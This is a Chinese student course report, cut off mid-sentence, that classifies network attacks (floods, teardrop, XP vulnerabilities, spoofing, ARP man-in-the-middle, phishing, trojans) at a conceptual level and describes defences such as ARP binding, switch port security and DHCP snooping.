計(jì)算機(jī)網(wǎng)絡(luò)課程設(shè)計(jì)之《網(wǎng)絡(luò)攻擊技術(shù)的分類與防范》

1、<p>　　網(wǎng)絡(luò)攻擊技術(shù)的分類與防范</p><p>　　學(xué)生姓名：XXX 指導(dǎo)老師：XXX</p><p>　　摘 要 本課程設(shè)計(jì)介紹了當(dāng)前網(wǎng)絡(luò)攻擊技術(shù)，通過(guò)分析攻擊手段的特點(diǎn)和對(duì)各種網(wǎng)絡(luò)攻擊行為所共有的關(guān)鍵特征進(jìn)行分析、提取，并根據(jù)其不同特點(diǎn)進(jìn)行分類，在對(duì)網(wǎng)絡(luò)攻擊進(jìn)行分析和識(shí)別的基礎(chǔ)上，提出了相應(yīng)的解決方案和防范方法，制定有針對(duì)性的防御措施，指出應(yīng)該明確安全對(duì)象，設(shè)置

2、強(qiáng)有力的安全防護(hù)體系；并要以預(yù)防為主，將重要的數(shù)據(jù)進(jìn)行備份并時(shí)刻監(jiān)視系統(tǒng)的運(yùn)行狀況。</p><p>　　關(guān)鍵字 網(wǎng)絡(luò)攻擊；防范技術(shù)； 信息安全</p><p><b>　　引 言</b></p><p>　　互聯(lián)網(wǎng)在為人們工作帶來(lái)便利的同時(shí), 伴隨著的是日趨嚴(yán)重的網(wǎng)絡(luò)安全問(wèn)題。美國(guó)互聯(lián)網(wǎng)調(diào)查機(jī)構(gòu)日前發(fā)布研究報(bào)告稱，中國(guó)現(xiàn)有網(wǎng)民一億三千七

3、百萬(wàn)，在世界上僅次于美國(guó)。近年，中國(guó)的網(wǎng)民增長(zhǎng)速度超過(guò)美國(guó)，預(yù)計(jì)未來(lái)幾年內(nèi)，網(wǎng)民的絕對(duì)數(shù)量也將趕超美國(guó)。隨著互聯(lián)網(wǎng)的飛速發(fā)展，特別是電子商務(wù)、電子政務(wù)、金融電子化進(jìn)程的不斷深入，人們對(duì)信息的依賴程度也越來(lái)越強(qiáng)，信息的安全題日益突出，根據(jù)權(quán)威機(jī)構(gòu)調(diào)查互聯(lián)網(wǎng)網(wǎng)站存在以下安全問(wèn)題：網(wǎng)站被篡改、主機(jī)被植入木馬、網(wǎng)絡(luò)仿冒事件、網(wǎng)頁(yè)惡意代碼事件、僵尸網(wǎng)絡(luò)。其中，網(wǎng)絡(luò)仿冒事件危害力極大。在美國(guó)，2008 年因域名仿冒等網(wǎng)絡(luò)釣魚(yú)造成的損失大約是40 億

4、美元，并以25%的速度遞增。2008 年12 月份中國(guó)互聯(lián)網(wǎng)調(diào)查報(bào)告表明，只有27.6%的網(wǎng)民認(rèn)為在網(wǎng)上進(jìn)行交易是安全的。因此，對(duì)各種網(wǎng)絡(luò)攻擊行為所共有的關(guān)鍵特征進(jìn)行分析、提取，并根據(jù)其不同特點(diǎn)進(jìn)行分類、并提出相對(duì)應(yīng)的防范方法對(duì)于人們認(rèn)識(shí)、防范網(wǎng)絡(luò)攻擊具有重要意義。</p><p>　　1 攻擊的目標(biāo)與分類</p><p><b>　　1.1 攻擊者</b></

5、p><p>　　攻擊者包括操作員、程序員、數(shù)據(jù)錄入員、內(nèi)部用戶和外部用戶，主要分為以下六種：(1) 黑客：攻擊的動(dòng)機(jī)與目的是為了表現(xiàn)自己或獲取訪問(wèn)權(quán)限。(2) 間諜：攻擊的動(dòng)機(jī)與目的是獲取情報(bào)信息。(3) 恐怖主義者：攻擊的動(dòng)機(jī)與目的是獲取恐怖主義集團(tuán)的利益。(4) 公司職員：攻擊的動(dòng)機(jī)與目的是獲取經(jīng)濟(jì)利益。(5) 職業(yè)犯罪分子：攻擊的動(dòng)機(jī)與目的是獲取個(gè)人利益。(6) 破壞者：攻擊的動(dòng)機(jī)與目的是破壞目標(biāo)網(wǎng)絡(luò)和系統(tǒng)。&

6、lt;/p><p><b>　　1.2 攻擊目標(biāo)</b></p><p>　　攻擊者為了達(dá)到物理破壞、信息破壞、數(shù)據(jù)欺騙、竊取服務(wù)、瀏覽和竊取信息等目的，一定要訪問(wèn)目標(biāo)網(wǎng)絡(luò)和系統(tǒng)，包括合法訪問(wèn)和非法訪問(wèn)。一般的，攻擊過(guò)程主要依賴于設(shè)計(jì)弱點(diǎn)、實(shí)現(xiàn)弱點(diǎn)和配置弱點(diǎn)，非法訪問(wèn)和使用目標(biāo)網(wǎng)絡(luò)的資源，即未授權(quán)訪問(wèn)或未授權(quán)使用目標(biāo)系統(tǒng)的資源。(1) 破壞信息：刪除或修改系統(tǒng)中存儲(chǔ)的信息

7、或者網(wǎng)絡(luò)中傳送的信息。(2) 竊取信息：竊取或公布敏感信息。</p><p>　　(3) 竊取服務(wù)：未授權(quán)使用計(jì)算機(jī)或網(wǎng)絡(luò)服務(wù)。(4) 拒絕服務(wù)：干擾系統(tǒng)和網(wǎng)絡(luò)的正常服務(wù)，降低系統(tǒng)和網(wǎng)絡(luò)的性能，甚至使系統(tǒng)和網(wǎng)絡(luò)崩潰。</p><p><b>　　1.3 攻擊分類</b></p><p>　　根據(jù)主動(dòng)攻擊與被動(dòng)攻擊的分類，將網(wǎng)絡(luò)攻擊分為以下四類。

8、(1) 中斷：中斷發(fā)送方與接收方之間的通信。(2) 攔截：作為第三者，截獲或者偵聽(tīng)通信內(nèi)容。(3) 篡改：攻擊者截?cái)嗤ㄐ?，將截獲的數(shù)據(jù)更改之后再交付給接收者，接收者認(rèn)為篡改后的信息就是發(fā)送者的原始信息。(4) 偽造：攻擊者偽造信息，將其以原始發(fā)送者的身份發(fā)送給接收者。</p><p><b>　　1.4 攻擊工具</b></p><p>　　攻擊者通常使用一系列包括攻

9、擊策略和方法的攻擊工具，對(duì)目標(biāo)網(wǎng)絡(luò)實(shí)施攻擊，這些工具如下：(1) 用戶命令：攻擊者在命令行狀態(tài)下或者以圖形用戶接口方式輸入攻擊命令。(2) 腳本或程序：利用腳本或者程序挖掘弱點(diǎn)。(3) 自治主體：攻擊者初始化一個(gè)程序或者程序片段，獨(dú)立執(zhí)行弱點(diǎn)挖掘和攻擊。(4) 工具包：使用攻擊工具軟件包，軟件包中可能包括進(jìn)行弱點(diǎn)挖掘、攻擊和破壞的多個(gè)工具。(5) 分布式工具：攻擊者分發(fā)攻擊工具到多臺(tái)主機(jī)，通過(guò)協(xié)作方式執(zhí)行攻擊。</p>&

10、lt;p><b>　　2 攻擊的基本過(guò)程</b></p><p>　　網(wǎng)絡(luò)攻擊持續(xù)的時(shí)間有長(zhǎng)有短，方法和手段多種多樣，達(dá)到的效果各異。經(jīng)過(guò)分析發(fā)現(xiàn)，所有成功的攻擊過(guò)程都大致相似。所以，可以給網(wǎng)絡(luò)攻擊定義一個(gè)通用的模型。該模型將攻擊過(guò)程歸納為若干階段，每個(gè)階段使用不同的方法和工具，實(shí)現(xiàn)不同的目標(biāo)。各階段前后呼應(yīng)，共同實(shí)現(xiàn)最終的攻擊目標(biāo)。網(wǎng)絡(luò)攻擊模型將攻擊過(guò)程劃分為攻擊身份和位置隱藏、目標(biāo)

11、系統(tǒng)信息收集、弱點(diǎn)信息挖掘分析、目標(biāo)使用權(quán)限獲取、攻擊行為隱蔽、攻擊實(shí)施、開(kāi)辟后門(mén)、攻擊痕跡清除等階段，如圖1 所示。</p><p>　　圖2.1 網(wǎng)絡(luò)攻擊的基本過(guò)程</p><p>　　3 常見(jiàn)網(wǎng)絡(luò)攻擊技術(shù)</p><p>　　3.1 針對(duì)網(wǎng)絡(luò)協(xié)議展開(kāi)的攻擊</p><p>　　網(wǎng)絡(luò)協(xié)議在設(shè)計(jì)之初并沒(méi)有考慮到協(xié)議的安全性能，但隨著互聯(lián)

12、網(wǎng)的發(fā)展，以及各式各樣針對(duì)協(xié)議的攻擊來(lái)看，發(fā)現(xiàn)一些攻擊正是利用了協(xié)議的特點(diǎn)。如以下幾種攻擊方式：</p><p>　　TCP SYN 拒絕服務(wù)攻擊：一般情況下，一個(gè)TCP連接的建立需要經(jīng)過(guò)三次握手的過(guò)程，利用這個(gè)過(guò)程，一些惡意的攻擊者可以進(jìn)行所謂的TCP SYN 拒絕服務(wù)攻擊：首先，攻擊者向目標(biāo)計(jì)算機(jī)發(fā)送一個(gè)TCP SYN報(bào)文；然后，目標(biāo)計(jì)算機(jī)收到這個(gè)報(bào)文后，建立TCP 連接控制結(jié)構(gòu)（TCB），并回應(yīng)一個(gè)ACK，

13、等待發(fā)起者的回應(yīng)；而發(fā)起者則不向目標(biāo)計(jì)算機(jī)回應(yīng)ACK 報(bào)文，這樣導(dǎo)致目標(biāo)計(jì)算機(jī)一致處于等待狀態(tài)。因此，目標(biāo)計(jì)算機(jī)如果接收到大量的TCP SYN 報(bào)文，而沒(méi)有收到發(fā)起者的第三次ACK 回應(yīng)，會(huì)一直等待，處于這樣尷尬狀態(tài)的半連接如果很多，則會(huì)把目標(biāo)計(jì)算機(jī)的資源（TCB 控制結(jié)構(gòu)，TCB，一般情況下是有限的）耗盡，而不能響應(yīng)正常的TCP 連接請(qǐng)求。</p><p>　　ICMP 洪水攻擊：正常情況下，為了對(duì)網(wǎng)絡(luò)進(jìn)行診斷

14、，一些診斷程序比如PING 等，會(huì)發(fā)出ICMP 響應(yīng)請(qǐng)求報(bào)文（ICMP ECHO），接收計(jì)算機(jī)接收到ICMP ECHO后，會(huì)回應(yīng)一個(gè)ICMP ECHO Reply 報(bào)文。而這個(gè)過(guò)程是需要CPU 處理的，有的情況下可能消耗掉大量的資源。這樣如果攻擊者向目標(biāo)計(jì)算機(jī)發(fā)送大量的ICMP ECHO 報(bào)文（產(chǎn)生ICMP 洪水），則目標(biāo)計(jì)算機(jī)會(huì)忙于處理這些ECHO 報(bào)文，而無(wú)法繼續(xù)處理其它的網(wǎng)絡(luò)數(shù)據(jù)報(bào)文，這也是一種拒絕服務(wù)攻擊（DOS）。</p

15、><p>　　UDP 洪水攻擊：原理與ICMP 洪水類似，攻擊者通過(guò)發(fā)送大量的UDP 報(bào)文給目標(biāo)計(jì)算機(jī)，導(dǎo)致目標(biāo)計(jì)算機(jī)忙于處理這些UDP 報(bào)文而無(wú)法繼續(xù)處理正常的報(bào)文。</p><p>　　淚滴攻擊：對(duì)于一些大的IP 包，需要對(duì)其進(jìn)行分片傳送，這是為了迎合鏈路層的MTU（最大傳輸單元）的要求。比如，一個(gè)4500 字節(jié)的IP 包，在MTU 為1500的鏈路上傳輸?shù)臅r(shí)候，就需要分成三個(gè)IP 包。在

16、IP 報(bào)頭中有一個(gè)偏移字段和一個(gè)分片標(biāo)志（MF），如果MF標(biāo)志設(shè)置為1，則表面這個(gè)IP 包是一個(gè)大IP 包的片斷，其中偏移字段指出了這個(gè)片斷在整個(gè)IP 包中的位置。例如，對(duì)一個(gè)4500 字節(jié)的IP 包進(jìn)行分片（MTU 為1500）， 則三個(gè)片斷中偏移字段的值依次為：0，1500，3000。這樣接收端就可以根據(jù)這些信息成功的組裝該IP 包。如果一個(gè)攻擊者打破這種正常情況，把偏移字段設(shè)置成不正確的值，即可能出現(xiàn)重合或斷開(kāi)</p>

17、<p>　　的情況，就可能導(dǎo)致目標(biāo)操作系統(tǒng)崩潰。比如，把上述偏移設(shè)置為0，1300，3000。這就是所謂的淚滴攻擊。</p><p>　　3.2 針對(duì)系統(tǒng)漏洞展開(kāi)攻擊</p><p>　　系統(tǒng)漏洞是指應(yīng)用軟件或操作系統(tǒng)軟件在邏輯設(shè)計(jì)上的缺陷或在編寫(xiě)時(shí)產(chǎn)生的錯(cuò)誤，這個(gè)缺陷或錯(cuò)誤可以被不法者或者電腦黑客利用，通過(guò)植入木馬、病毒等方式來(lái)攻擊或控制整個(gè)電腦，從而竊取用戶電腦中的重要

18、資料和信息，甚至破壞系統(tǒng)。如Windows XP 默認(rèn)啟動(dòng)的UPNP 服務(wù)就存在嚴(yán)重安全漏洞。UPNP(UniversalPlug and Play) 體系面向無(wú)線設(shè)備、PC 機(jī)和智能應(yīng)用，提供普遍的對(duì)等網(wǎng)絡(luò)連接，在家用信息設(shè)備、辦公用網(wǎng)絡(luò)設(shè)備間提供TCP/IP 連接和Web 訪問(wèn)功能，該服務(wù)可用于檢測(cè)和集成UPNP 硬件。UPNP 協(xié)議存在的安全漏洞，使攻擊者可非法獲取任何Windows XP的系統(tǒng)級(jí)訪問(wèn)，從而進(jìn)行攻擊，甚至可通過(guò)控制

19、多臺(tái)XP 機(jī)器發(fā)起分布式的攻擊。</p><p>　　其次，服務(wù)拒絕漏洞：Windows XP 支持點(diǎn)對(duì)點(diǎn)的協(xié)議（PPTP），是作為遠(yuǎn)程訪問(wèn)服務(wù)實(shí)現(xiàn)的虛擬專用網(wǎng)技術(shù)。在用于控制建立、維護(hù)和拆開(kāi)PPTP 連接的代碼段中存在未經(jīng)檢查的緩存，導(dǎo)致Windows XP 的實(shí)現(xiàn)中存在漏洞。通過(guò)向一臺(tái)存在該漏洞的服務(wù)器發(fā)送不正確的PPTP 控制數(shù)據(jù)，攻擊者可損壞核心內(nèi)存并導(dǎo)致系統(tǒng)失效，中斷所有系統(tǒng)中正在運(yùn)行的進(jìn)程。該漏洞可攻

20、擊任何一臺(tái)提供PPTP 服務(wù)的服務(wù)器，對(duì)于PPTP 客戶端的工作站，攻擊者只需激活PPTP 會(huì)話即可進(jìn)行攻擊。相對(duì)安全的Linux 系統(tǒng)也存在著漏洞如：LinuxUtil－Linux Login Pam（權(quán)限提升漏洞）util－linux 軟件包中提供了很多標(biāo)準(zhǔn)UNIX 工具，例如login。它存在一個(gè)問(wèn)題可允許本地用戶提升權(quán)限。如果某些用戶的login訪問(wèn)受到pam＿limits 控制的話，就可能導(dǎo)致一些不可預(yù)料的結(jié)果：登錄的用戶可能

21、獲取控制臺(tái)或者系統(tǒng)用戶的權(quán)限。</p><p>　　3.3 其它攻擊方式</p><p>　　WWW 的欺騙技術(shù)：在網(wǎng)上用戶可以利用IE 等瀏覽器進(jìn)行各種各樣的WEB 站點(diǎn)的訪問(wèn)，如閱讀新聞、咨詢產(chǎn)品價(jià)格、訂閱報(bào)紙、電子商務(wù)等。然而一些用戶可能不會(huì)想到有這些問(wèn)題存在：正在訪問(wèn)的網(wǎng)頁(yè)已經(jīng)被黑客篡改過(guò)，網(wǎng)頁(yè)上的信息是虛假的！例如黑客將用戶要瀏覽的網(wǎng)頁(yè)的URL 改寫(xiě)為指向黑客自己的服務(wù)器，當(dāng)用

22、戶瀏覽目標(biāo)網(wǎng)頁(yè)的時(shí)候，實(shí)際上是向黑客服務(wù)器發(fā)出請(qǐng)求，那么黑客就可以獲得一些如帳號(hào)、密碼等信息。</p><p>　　電子郵件攻擊：電子郵件攻擊主要表現(xiàn)為兩種方式。一是電子郵件轟炸和電子郵件“滾雪球”，也就是通常所說(shuō)的郵件炸彈，是指用偽造的IP 地址和電子郵件地址向同一信箱發(fā)送數(shù)以千計(jì)、萬(wàn)計(jì)甚至無(wú)窮多次的內(nèi)容相同的垃圾郵件，致使受害人郵箱被“炸”，嚴(yán)重者還會(huì)給電子郵件服務(wù)器操作系統(tǒng)帶來(lái)危險(xiǎn)，甚至癱瘓；二是電子郵件欺

23、騙，攻擊者佯稱自己為系統(tǒng)管理員（郵件地址和系統(tǒng)管理員貌似相同），這類欺騙只要用戶提高警惕，一般危害性不是太大。</p><p>　　放置特洛伊木馬程序：特洛伊木馬程序可以直接侵入用戶的電腦并進(jìn)行破壞，它常被偽裝成工具程序或者游戲等誘使用戶打開(kāi)帶有特洛伊木馬程序的郵件附件或從網(wǎng)上直接下載，一旦用戶打開(kāi)了這些郵件的附件或者執(zhí)行了這些程序之后，它們就會(huì)在自己的計(jì)算機(jī)系統(tǒng)中隱藏一個(gè)可以在Windows 啟動(dòng)時(shí)悄悄執(zhí)行的程

24、序。當(dāng)您連接到因特網(wǎng)上時(shí)，這個(gè)程序就會(huì)通知黑客，來(lái)報(bào)告您的IP 地址以及預(yù)先設(shè)定的端口。黑客在收到這些信息后，再利用這個(gè)潛伏在其中的程序，就可以任意地修改您的計(jì)算機(jī)的參數(shù)設(shè)定、復(fù)制文件、窺視你整個(gè)硬盤(pán)中的內(nèi)容等，從而達(dá)到控制計(jì)算機(jī)的目的。</p><p>　　4 常見(jiàn)網(wǎng)絡(luò)攻擊及防范技術(shù)</p><p>　　網(wǎng)絡(luò)攻擊技術(shù)多種多樣，各種攻擊工具都使用了一種或者綜合使用多種攻擊技術(shù)。下面簡(jiǎn)單介紹

25、常見(jiàn)的網(wǎng)絡(luò)攻擊技術(shù)及其防范。</p><p><b>　　4.1 網(wǎng)絡(luò)欺騙</b></p><p>　　網(wǎng)絡(luò)欺騙(Spoofing) 是指攻擊者通過(guò)偽造自己在網(wǎng)絡(luò)上的身份，得到目標(biāo)主機(jī)或者網(wǎng)絡(luò)的訪問(wèn)權(quán)限。在T C P ／ I P 協(xié)議中，數(shù)據(jù)包的一些域具有特定的含義。例如，I P 包的哪個(gè)域表示數(shù)據(jù)的來(lái)源、哪個(gè)域表示目標(biāo)，郵件的哪個(gè)域表示郵件地址等，都有固定的結(jié)構(gòu)。通

26、過(guò)底層網(wǎng)絡(luò)編程技術(shù)，可以方便地偽造任意內(nèi)容的網(wǎng)絡(luò)數(shù)據(jù)包，因此網(wǎng)絡(luò)上的主機(jī)都面臨著被欺騙的威脅。在實(shí)際攻擊過(guò)程中，網(wǎng)絡(luò)欺騙通常作為一種進(jìn)攻手段，用于獲得目標(biāo)主機(jī)的信任，然后再利用這種信任關(guān)系對(duì)其實(shí)施攻擊。常見(jiàn)的網(wǎng)絡(luò)欺騙技術(shù)有IP 欺騙、電子郵件欺騙、Web 欺騙和ARP 欺騙。</p><p>　?。?）I P 欺騙是指使用虛假的I P 地址來(lái)達(dá)到欺騙的目的。</p><p>　　改變I P

27、 地址。這是攻擊者首選的欺騙方式之一，攻擊者修改數(shù)據(jù)包的源I P 地址，偽裝成被假冒者機(jī)器的I P 地址，如圖4.1 所示。攻擊者改變數(shù)據(jù)包源地址的主要目的是隱藏攻擊的來(lái)源，一方面，即使攻擊行為被對(duì)方發(fā)現(xiàn)，也不能根據(jù)I P 地址找到攻擊的來(lái)源，從而攻擊者可以逃避制裁和懲罰。另一方面，如果目標(biāo)系統(tǒng)中存在以I P 地址作為鑒別標(biāo)準(zhǔn)的授權(quán)行為，則攻擊者可以獲得被假冒方的權(quán)限。修改數(shù)據(jù)包的I P 地址需通過(guò)低層的網(wǎng)絡(luò)編程實(shí)現(xiàn)。</p>

28、;<p><b>　　發(fā)送信息</b></p><p><b>　　返回信息</b></p><p>　　圖4.1 改變IP地址欺騙</p><p>　　源路由欺騙。如果只改變數(shù)據(jù)包的源IP 地址，那么目標(biāo)主機(jī)的應(yīng)答回到被假冒的地址上，攻擊者不能得到應(yīng)答。攻擊者如果想了解會(huì)話情況，必須保證自己插入到應(yīng)答經(jīng)過(guò)

29、的網(wǎng)絡(luò)通路上。攻擊者使用T C P ／ I P 協(xié)議提供的一種機(jī)制( 源路由選項(xiàng))，并把自己的I P 地址置于所指定的地址序列清單中。當(dāng)目標(biāo)端回應(yīng)時(shí)，數(shù)據(jù)包返回到假冒的I P 地址處，但它會(huì)經(jīng)過(guò)攻擊者的機(jī)器，這樣可以保證攻擊者得到應(yīng)答數(shù)據(jù)包。</p><p>　　針對(duì)I P 欺騙攻擊的防范措施有以下幾種。</p><p>　　拋棄基于地址的信任策略，阻止這類攻擊的一種十分容易的辦法就是放棄

30、以地址為基礎(chǔ)的驗(yàn)證。不允許r類遠(yuǎn)程調(diào)用命令的使用；刪除.rhosts 文件；清空/etc/hosts.equiv 文件。這將迫使所有用戶使用其它遠(yuǎn)程通信手段，如telnet、ssh、skey等等。 </p><p>　　使用加密方法 在包發(fā)送到 網(wǎng)絡(luò)上之前，我們可以對(duì)它進(jìn)行加密。雖然加密過(guò)程要求適當(dāng)改變目前的網(wǎng)絡(luò)環(huán)境，但它將保證數(shù)據(jù)的完整性、真實(shí)性和保密性。</p><p>　　可以配置路

31、由器使其能夠拒絕網(wǎng)絡(luò)外部與本網(wǎng)內(nèi)具有相同IP地址的連接請(qǐng)求。而且，當(dāng)包的IP地址不在本網(wǎng)內(nèi)時(shí)，路由器不應(yīng)該把本網(wǎng)主機(jī)的包發(fā)送出去。有一點(diǎn)要注意，路由器雖然可以封鎖試圖到達(dá)內(nèi)部網(wǎng)絡(luò)的特定類型的包。但它們也是通過(guò)分析測(cè)試源地址來(lái)實(shí)現(xiàn)操作的。因此，它們僅能對(duì)聲稱是來(lái)自于內(nèi)部網(wǎng)絡(luò)的外來(lái)包進(jìn)行過(guò)濾，若你的網(wǎng)絡(luò)存在外部可信任主機(jī)，那么路由器將無(wú)法防止別人冒充這些主機(jī)進(jìn)行IP欺騙。</p><p>　?。?）電子郵件欺騙，攻擊

32、者使用電子郵件進(jìn)行欺騙有三個(gè)目的。第一，隱藏自己的身份。第二，通過(guò)假冒電子郵件地址使自己看起來(lái)像某個(gè)其他人。第三，社會(huì)工程的一種表現(xiàn)形式，獲取想要的信息。例如，如果攻擊者想讓用戶發(fā)給他一份敏感文件，攻擊者可以偽裝其他的郵件地址，使用戶認(rèn)為這是老板或者管理員的要求，從而按要求發(fā)送信息。</p><p>　　相似的電子郵件地址。假冒一個(gè)相似的郵件地址發(fā)送郵件，如I iuchang @163.com 與1iuchang

33、@163．com，因?yàn)猷]件地址似乎是正確的，所以收信人很可能會(huì)回復(fù)它，這樣攻擊者就會(huì)得到想要的信息。</p><p>　　針對(duì)電子郵件欺騙可以采用修改郵件客戶軟件的方法防范。當(dāng)發(fā)出電子郵件時(shí)，沒(méi)有對(duì)發(fā)件人地址進(jìn)行驗(yàn)證或者確認(rèn)，因此他能夠指定他希望出現(xiàn)在發(fā)件人中的任意地址。當(dāng)用戶回信時(shí)，答復(fù)回到真實(shí)的地址，而不是回到被盜用了地址的人那里。</p><p>　　（3）Web欺騙，網(wǎng)站通常是各種

34、目的攻擊者的主要攻擊目標(biāo)，而Web欺騙是網(wǎng)站面臨的一種主要攻擊。網(wǎng)站欺騙分兩大類，一類是加密他人的網(wǎng)站、使用U R L重寫(xiě)技術(shù)隱藏真正的網(wǎng)站地址，欺騙網(wǎng)站的瀏覽者，另一類是使用匿名代理技術(shù)瀏覽網(wǎng)站，欺騙網(wǎng)站服務(wù)的提供者，而中間人攻擊則可以達(dá)到欺騙雙方的目的。</p><p>　　基本的網(wǎng)站欺騙，目前在互聯(lián)網(wǎng)上注冊(cè)一個(gè)域名沒(méi)有嚴(yán)格的審查，攻擊者可以搶先或特別設(shè)計(jì)注冊(cè)一個(gè)非常類似的有欺騙性的站點(diǎn)。當(dāng)用戶瀏覽了這個(gè)假冒

35、地址，并與站點(diǎn)作了一些信息交流，如填寫(xiě)了一些表單之后，站點(diǎn)會(huì)給出一些響應(yīng)式的提示和回答，同時(shí)記錄下用戶的信息。典型的例子是假冒金融機(jī)構(gòu)的網(wǎng)站，偷盜客戶的信用卡、銀行卡等信息。例如，中國(guó)工商銀行網(wǎng)站為“www.icbc.com.cn”，有人注冊(cè)了網(wǎng)站“www.lcbc.corn.cn ”。這種欺騙方式被專家定義為網(wǎng)絡(luò)陷阱程序，也稱為網(wǎng)絡(luò)釣魚(yú)程序(phishing)，多以欺騙用戶信用卡號(hào)、銀行賬號(hào)、股票信息等獲取經(jīng)濟(jì)利益為目的。</p

36、><p>　　防止基本的網(wǎng)站欺騙的最好辦法是：使用站點(diǎn)服務(wù)器認(rèn)證。由于服務(wù)器認(rèn)證是服務(wù)器向客戶提供的一個(gè)有效證書(shū)，它能證明誰(shuí)是誰(shuí)，可以把證書(shū)看作服務(wù)器的一張身份證。服務(wù)器認(rèn)證不容易被欺騙而且提供了較高級(jí)別的保護(hù)，確保正在連接的站點(diǎn)是真正屬于用戶所期待的站點(diǎn)。</p><p>　　中間人攻擊，攻擊者找到一個(gè)位置，使進(jìn)出受害方的所有流量都經(jīng)過(guò)他。攻擊者通過(guò)某種方法把目標(biāo)機(jī)器的域名對(duì)應(yīng)的I P 更改

37、為攻擊者所控制的機(jī)器，這樣所有外界對(duì)目標(biāo)機(jī)器的請(qǐng)求將涌向攻擊者的機(jī)器，這時(shí)攻擊者可以轉(zhuǎn)發(fā)所有的請(qǐng)求到目標(biāo)機(jī)器，讓目標(biāo)機(jī)器進(jìn)行處理，再把處理結(jié)果發(fā)回到發(fā)出請(qǐng)求的客戶機(jī)。實(shí)際上，中間人攻擊是把攻擊者的機(jī)器設(shè)成目標(biāo)機(jī)器的代理服務(wù)器，收集大量的信息。</p><p>　　URL重寫(xiě)是指修改( 或重寫(xiě))Web內(nèi)容中的URL，比如指向與原始URL 不同位置的結(jié)果URL。在URL 重寫(xiě)中，攻擊者通過(guò)改寫(xiě)URL 能夠把網(wǎng)絡(luò)流量轉(zhuǎn)

38、到攻擊者控制的另一個(gè)站點(diǎn)上，因而所有信息便處于攻擊者的監(jiān)視之中。</p><p>　?。?）ARP欺騙是一種典型的中間人攻擊方法，如圖4.2 所示。正常情況下，當(dāng)A 與B 需要通信時(shí)，A發(fā)送ARPR equest 詢問(wèn)B 的MA C 地址，B 發(fā)送ARPReply 告訴A 自己的MAC 地址。</p><p><b>　　我是B 我是A</b></p>

39、<p><b>　　Haeker</b></p><p>　　4.2 ARP欺騙</p><p>　　ARP 欺騙是Hacker 發(fā)送偽裝的ARPReply 告訴A，計(jì)算機(jī)B 的MAC 地址是Hacker 計(jì)算機(jī)的MAC 地址。Hacker 發(fā)送偽裝的ARPReply 告訴B，計(jì)算機(jī)A 的MAC 地址是Hacker 計(jì)算機(jī)的MAC地址。這樣A 與B 之

40、間的通信都將先經(jīng)過(guò)Hacker，然后由Hacker 進(jìn)行轉(zhuǎn)發(fā)。于是Hacker 可以捕獲到所有A 與B 之間的數(shù)據(jù)傳輸( 如用戶名和密碼)。</p><p>　　針對(duì)ARP欺騙攻擊有以下防范措施：</p><p>　　ARP雙向綁定。單純依靠IP或MAC來(lái)建立信任關(guān)系是不安全的，理想的安全關(guān)系是建立在IP+MAC的基礎(chǔ)上。設(shè)置靜態(tài)的IP/MAC 對(duì)應(yīng)表，不要讓主機(jī)動(dòng)態(tài)刷新你設(shè)定好的轉(zhuǎn)換表。

41、并進(jìn)行A R P雙向綁定，所謂“雙向綁定”就是在網(wǎng)關(guān)上綁定客戶機(jī)的I P 地址和MAC 地址，同時(shí)，在客戶機(jī)上也綁定網(wǎng)關(guān)的I P 地址和MAC 地址。具體實(shí)現(xiàn)方法如下：</p><p>　　首先，需要在本地主機(jī)上使用命令“arps 網(wǎng)關(guān)IP地址網(wǎng)關(guān)MAC 地址”來(lái)綁定網(wǎng)關(guān)的IP 地址和MAC 地址；其次，要在內(nèi)網(wǎng)交換機(jī)端口上綁定內(nèi)部合法主機(jī)的MAC地址和IP地址：</p><p>　　Sw

42、itch>enable // 進(jìn)入交換機(jī)特權(quán)模式</p><p>　　Switch#config terminal // 進(jìn)入交換機(jī)全局配置模式</p><p>　　Switch(config)#interface fa0/1 // 進(jìn)入接口配置模式</p><p>　　Switch(config-if)#switchport port-security//

43、配置端口安全功能</p><p>　　Switch(config-if)#switchport port-security mac-address MAC( 主機(jī)的MAC 地址) ip-addressIP( 綁定的IP 地址) // 配置該端口的安全MAC 地址 和綁定的IP 地址。</p><p>　　這樣，只有這臺(tái)主機(jī)可以通過(guò)端口1使用網(wǎng)絡(luò)，如果其他P C 想通過(guò)這個(gè)端口使用網(wǎng)絡(luò)，必須

44、對(duì)交換機(jī)的此項(xiàng)設(shè)置進(jìn)行修改。雙向綁定方法適合于機(jī)器數(shù)量較少且不經(jīng)常更換的地方，如：網(wǎng)吧、學(xué)校機(jī)房等。而對(duì)于大型局域網(wǎng)則不適用，因?yàn)樾枰瓿纱罅康呐渲萌蝿?wù)，工作量太大，不容易實(shí)施。</p><p>　　建立DHCP 服務(wù)器，為了在網(wǎng)絡(luò)中方便對(duì)客戶機(jī)的I P 地址進(jìn)行有效管理，而不需要一個(gè)一個(gè)手動(dòng)指定I P 地址，通常用DHCP(Dynamic Host Con-figure Protocol，動(dòng)態(tài)主機(jī)配置協(xié)議) 讓

45、客戶機(jī)自動(dòng)獲取動(dòng)態(tài)IP地址。因?yàn)锳RP欺騙攻擊一般總是先攻擊網(wǎng)關(guān)，將DHCP服務(wù)器建立在網(wǎng)關(guān)上，利用DHCP Snooping 技術(shù)建立和維護(hù)DHCP Snooping 綁定表，過(guò)濾不可信任的DHCP信息。DHCP Snooping 開(kāi)啟后，主機(jī)將向DHCP 服務(wù)器發(fā)送DHCP REQUEST 廣播包，DHCP 服務(wù)器將返回一個(gè)DHCPACK 單播包，這些報(bào)文都要通過(guò)DHCP Snooping 的監(jiān)聽(tīng)，交換機(jī)會(huì)自動(dòng)將主機(jī)所在端口以及主機(jī)

46、的MAC地址和DHCP 服務(wù)器分配給主機(jī)的IP地址保存在一個(gè)動(dòng)態(tài)表中，并形成動(dòng)態(tài)綁定關(guān)系。同時(shí)，啟用ARP inspection 功能，即對(duì)ARP 報(bào)文的檢測(cè)。只有符合DHCP Snooping 動(dòng)態(tài)綁定表中綁定關(guān)系的主機(jī)才能發(fā)送和接收A R P 報(bào)文，否則過(guò)濾掉，以達(dá)到防止ARP 欺騙的目的。</p><p>　　劃分安全區(qū)域, 一般情況下，A R P 廣播包是不能跨子網(wǎng)或者網(wǎng)段傳播的，也就是說(shuō)子網(wǎng)、網(wǎng)段可以隔

